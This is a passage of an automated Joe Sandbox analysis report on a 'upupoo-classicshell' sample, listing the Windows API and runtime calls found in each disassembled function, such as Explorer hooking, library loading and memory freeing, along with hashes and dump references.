• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1263568516-0
                                                                                                              • Opcode ID: dc8e724e0ff21c0412fb62cd0ae05e4c49d9826d716a838ecdd27c1292aef611
                                                                                                              • Instruction ID: 70408f8f090b1ec7cf2a2c782113d04217ef852cc56dcff32a5840caf75fdbe5
                                                                                                              • Opcode Fuzzy Hash: dc8e724e0ff21c0412fb62cd0ae05e4c49d9826d716a838ecdd27c1292aef611
                                                                                                              • Instruction Fuzzy Hash: 08D0C975618200AFCB059B98D894A2877B1EF99310F004418B6A1872A0D6329814CE01
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNELBASE(00008000,00000000,00008000,6E0A770C), ref: 6E0A73E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 1263568516-0
                                                                                                              • Opcode ID: 44055a9bc10c09ae0b040af6ef01b8f69ec7c05b78f1d38e817e8d4388aa9702
                                                                                                              • Instruction ID: 3530ef66c2494c7e26170ff13b6d44e7873ac421af9d45225261c3864a771506
                                                                                                              • Opcode Fuzzy Hash: 44055a9bc10c09ae0b040af6ef01b8f69ec7c05b78f1d38e817e8d4388aa9702
                                                                                                              • Instruction Fuzzy Hash: 57C09B31948700FBD7614A40CD59F6577D07F50755F11C4147254540D4C7715458DE05
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ClassicStartMenuDLL.dll), ref: 00C21028
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: hooking Explorer), ref: 00C21042
                                                                                                              • FindWindowW.USER32(ApplicationManager_DesktopShellWindow,00000000), ref: 00C2108B
                                                                                                              • FindWindowExW.USER32(00000000,00000000,Progman,00000000), ref: 00C210A5
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: can't find Progman, retrying), ref: 00C210CE
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00C210D8
                                                                                                                • Part of subcall function 00C22BB0: GetVersion.KERNEL32(00C21056), ref: 00C22BBB
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00C210F3
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C21105
                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 00C21120
                                                                                                              • PathFindFileNameW.SHLWAPI(?,explorer.exe,00000000,00000000,?,00000104), ref: 00C21133
                                                                                                              • __wcsicoll.LIBCMT ref: 00C2113A
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: found wrong process %s,?), ref: 00C21159
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: failed to get process name,00000000,00000000,?,00000104), ref: 00C2116A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C21170
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: failed to open process %d,?), ref: 00C21190
                                                                                                              • ?FindTaskBar@@YAPAUHWND__@@K@Z.CLASSICSTARTMENUDLL(?), ref: 00C211A5
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: can't find taskbar, retrying), ref: 00C211C9
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00C211D3
                                                                                                              • ?ToggleStartMenu@@YAPAUHWND__@@H_N@Z.CLASSICSTARTMENUDLL(000000FF,00000000), ref: 00C211E9
                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C21202
                                                                                                              • SetWindowsHookExW.USER32(00000003,6E0A737E,?,00000000), ref: 00C21216
                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00C21225
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: hook failed: 0x%08X,00000000,?,00000000), ref: 00C21236
                                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00C2124A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File@@$FindWindow$Process$D__@@FileHandleModuleNameSleepThread$Bar@@CloseErrorHookLastMenu@@MessageOpenPathPostStartTaskToggleVersionWindows__wcsicoll
                                                                                                              • String ID: ApplicationManager_DesktopShellWindow$ClassicStartMenuDLL.dll$Progman$Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartMenu: can't find Progman, retrying$StartMenu: can't find taskbar, retrying$StartMenu: failed to get process name$StartMenu: failed to open process %d$StartMenu: found wrong process %s$StartMenu: hook failed: 0x%08X$StartMenu: hooking Explorer$explorer.exe
                                                                                                              • API String ID: 1093036710-2932179043
                                                                                                              • Opcode ID: b7368ad79bcaf1561f1f03256f0c30478191ce2c788d547bba37cfb3374433f9
                                                                                                              • Instruction ID: 3be6c745f814ccdbaf265b8aa83d6393fa6ff045bb2070f4fa5eb63d65ec0a9c
                                                                                                              • Opcode Fuzzy Hash: b7368ad79bcaf1561f1f03256f0c30478191ce2c788d547bba37cfb3374433f9
                                                                                                              • Instruction Fuzzy Hash: 75512530790391BBD320EB60BC4AFAF73A4BBA4702F090528FD91D66D0D675D7058BA6
                                                                                                              APIs
                                                                                                              • _wcschr.LIBCMT ref: 00C22C4F
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242B6
                                                                                                                • Part of subcall function 00C242A0: _wcschr.LIBCMT ref: 00C242DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcschr
                                                                                                              • String ID: \
                                                                                                              • API String ID: 2691759472-2967466578
                                                                                                              • Opcode ID: ce0b589a0f3a191fb02d194947764df01058e1e1d037e1492aa8bcbf27f5763a
                                                                                                              • Instruction ID: 63578e1fd0ea0369563c9ad303144ca7a617c13413e756f5a2c5d9b47151b715
                                                                                                              • Opcode Fuzzy Hash: ce0b589a0f3a191fb02d194947764df01058e1e1d037e1492aa8bcbf27f5763a
                                                                                                              • Instruction Fuzzy Hash: 14414571504321ABD730AF28FC82BAFB3A4FF94314F44492DE99947682F7769644C792
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C27B04
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C27B19
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00C34194), ref: 00C27B24
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00C27B40
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00C27B47
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              • Opcode ID: 482820b66dec116d375395c05b4e87cf7bf09bce436ba27e00ca57ba209109da
                                                                                                              • Instruction ID: cbba21689a5448a5e6ff4b37c8f77ff3a548279f2d8d22580141b23ae31a4956
                                                                                                              • Opcode Fuzzy Hash: 482820b66dec116d375395c05b4e87cf7bf09bce436ba27e00ca57ba209109da
                                                                                                              • Instruction Fuzzy Hash: 0D21DEB4920304EFD708DF65FD8978C7BA4BB18305F50501AEA8987370EBB55AA4DF4A
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6,100146C0,0000000C,10003C6F,?), ref: 100074B8
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,1000746D,?,100148D8,0000000C,100075A0,00000000,00000000,00000001,10003DC6,100146C0,0000000C,10003C6F,?), ref: 100074BF
                                                                                                              • ExitProcess.KERNEL32 ref: 100074D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: db214c5660a48c07b104a03def8940d1828227caabefa1d35cb8619f3b7a42c1
                                                                                                              • Instruction ID: a02e29ad9b9ef0aec913e02335b899d5739eea22ae5e8b65d5d07e11f2ab0f9f
                                                                                                              • Opcode Fuzzy Hash: db214c5660a48c07b104a03def8940d1828227caabefa1d35cb8619f3b7a42c1
                                                                                                              • Instruction Fuzzy Hash: E2E04631401108ABEB42AF60CD48A583FAAFB006C2B108418F8088A43ACB39EE52DB90
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C,6E0C3AE8,0000000C,6E0A86F5,?), ref: 6E0B0298
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,6E0B024D,?,6E0C3D90,0000000C,6E0B0380,00000000,00000000,00000001,6E0A884C,6E0C3AE8,0000000C,6E0A86F5,?), ref: 6E0B029F
                                                                                                              • ExitProcess.KERNEL32 ref: 6E0B02B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: b23f55cf730a95eccbe120a9b3501a633d8a2def951e338c5c1664c595140054
                                                                                                              • Instruction ID: 013a2e2a3a458274b85be1ad4d4c490a12209638f2f1e0f55c36716606bf4c76
                                                                                                              • Opcode Fuzzy Hash: b23f55cf730a95eccbe120a9b3501a633d8a2def951e338c5c1664c595140054
                                                                                                              • Instruction Fuzzy Hash: F8E01A31424648EFCF116FD4CA48B993BA9BF55385B000414F81447120DF379845CE40
                                                                                                              APIs
                                                                                                                • Part of subcall function 6E0A783D: LoadLibraryW.KERNEL32 ref: 6E0A795C
                                                                                                                • Part of subcall function 6E0A783D: LoadLibraryW.KERNEL32(?), ref: 6E0A7965
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A798B
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A799A
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A79A4
                                                                                                              • LoadLibraryW.KERNEL32(?,00000001,00000000,?,?), ref: 6E0A7DC0
                                                                                                              • LoadLibraryW.KERNEL32(?,?,?), ref: 6E0A7DC9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7ED9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7EE9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7EF9
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000043), ref: 6E0A7F09
                                                                                                              • GetProcAddress.KERNEL32(00000000,00006946), ref: 6E0A7F16
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7F26
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
• Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                              • String ID: C$ExW$Fi$P$W$cW$l$lls$ndW$p$r$ry$thAp$v
                                                                                                              • API String ID: 2238633743-3144811114
                                                                                                              • Opcode ID: afa0dd47e335872a58e0b030dc693a57af7038e8f7e63529db081258b331063e
                                                                                                              • Instruction ID: 72551cee6a133fdea967f897432d9e55b469b22ff30d9e1bfb515c599c32ee5d
                                                                                                              • Opcode Fuzzy Hash: afa0dd47e335872a58e0b030dc693a57af7038e8f7e63529db081258b331063e
                                                                                                              • Instruction Fuzzy Hash: B3C1F92156C3C499E330CBA49851BABB7E4FFA5B10F106D1EE6C8CB2A1E7B14544C75B
                                                                                                              APIs
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 100052B0
                                                                                                              • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 1000532B
                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 100053A9
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 1000542B
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 1000545C
                                                                                                              • FindHandlerForForeignException.LIBVCRUNTIME ref: 100054AB
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 100054CD
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 100054E5
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 100054ED
                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 100054F9
                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 10005504
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 410073093-393685449
                                                                                                              • Opcode ID: 28e85d9537e823bd0f3738717f75f5abad39e737950120410e219715fdd589e1
                                                                                                              • Instruction ID: e7e5ebab23954d1ba523b912dc674d2a6081c75374b45c11898d79fb377913f1
                                                                                                              • Opcode Fuzzy Hash: 28e85d9537e823bd0f3738717f75f5abad39e737950120410e219715fdd589e1
                                                                                                              • Instruction Fuzzy Hash: 4EB1AB3480070AAFEF20CF94C841ADFBBB5FF09396F114259E80127659C776EA95CBA1
                                                                                                              APIs
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E0AC048
                                                                                                              • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 6E0AC0C3
                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E0AC141
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 6E0AC1C3
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E0AC1F4
                                                                                                              • FindHandlerForForeignException.LIBVCRUNTIME ref: 6E0AC243
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 6E0AC265
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 6E0AC27D
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E0AC285
                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 6E0AC291
                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E0AC29C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 410073093-393685449
                                                                                                              • Opcode ID: b688430083aa5f6bef1698166671e0bd984232be9151ec0a45668486d8f44865
                                                                                                              • Instruction ID: 20132f1c1da1871fc61431d3e343e1e3f716792fd5a4660ebcbe5e2dfd0d75b8
                                                                                                              • Opcode Fuzzy Hash: b688430083aa5f6bef1698166671e0bd984232be9151ec0a45668486d8f44865
                                                                                                              • Instruction Fuzzy Hash: 3FB1667180020E9FCF10CFD8C880B9EB7F9BF59354F024959EA146B656D335AA51CFA1
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00C247AD,?,00C2133E), ref: 00C246D9
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,00C2133E), ref: 00C246F2
                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 00C2470C
                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 00C24719
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,00C2133E), ref: 00C2474B
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00C2133E), ref: 00C2474E
                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00C24764
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00C2133E), ref: 00C24771
                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00C2133E), ref: 00C24774
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                               • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                              • String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
                                                                                                              • API String ID: 3830925854-2586642590
                                                                                                              • Opcode ID: e0a9452c3c574c0ebc3416389c567db5dad77e3c634148796c65eb5746204f63
                                                                                                              • Instruction ID: b55d77980c238985982468fa879bf50d9c11484236601a7dd2a8908791d4c9b2
                                                                                                              • Opcode Fuzzy Hash: e0a9452c3c574c0ebc3416389c567db5dad77e3c634148796c65eb5746204f63
                                                                                                              • Instruction Fuzzy Hash: 46116D71A203A1AFDB20DFF9AC88B1E7AACEB49B42B054439E511C3250DB708901CB60
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 10009E07
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABAF
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABC1
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABD3
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABE5
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABF7
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC09
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC1B
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC2D
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC3F
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC51
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC63
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC75
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC87
                                                                                                              • _free.LIBCMT ref: 10009DFC
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 10009E1E
                                                                                                              • _free.LIBCMT ref: 10009E33
                                                                                                              • _free.LIBCMT ref: 10009E3E
                                                                                                              • _free.LIBCMT ref: 10009E60
                                                                                                              • _free.LIBCMT ref: 10009E73
                                                                                                              • _free.LIBCMT ref: 10009E81
                                                                                                              • _free.LIBCMT ref: 10009E8C
                                                                                                              • _free.LIBCMT ref: 10009EC4
                                                                                                              • _free.LIBCMT ref: 10009ECB
                                                                                                              • _free.LIBCMT ref: 10009EE8
                                                                                                              • _free.LIBCMT ref: 10009F00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: 9b8d6b642b3fe7adbadd563faff1799b9fe67ef26343c44727cecfe6d835cf6e
                                                                                                              • Instruction ID: 18af7cc24efe9eb99d0d7cae4cc31abb0d5d8b52d7f5000be87298f4786c8f56
                                                                                                              • Opcode Fuzzy Hash: 9b8d6b642b3fe7adbadd563faff1799b9fe67ef26343c44727cecfe6d835cf6e
                                                                                                              • Instruction Fuzzy Hash: CF311731A043859BFB61DA39D845B6A73E9FF002D0F11442AE459D7299DF79BD80DB20
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E0B433B
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4628
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B463A
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B464C
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B465E
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4670
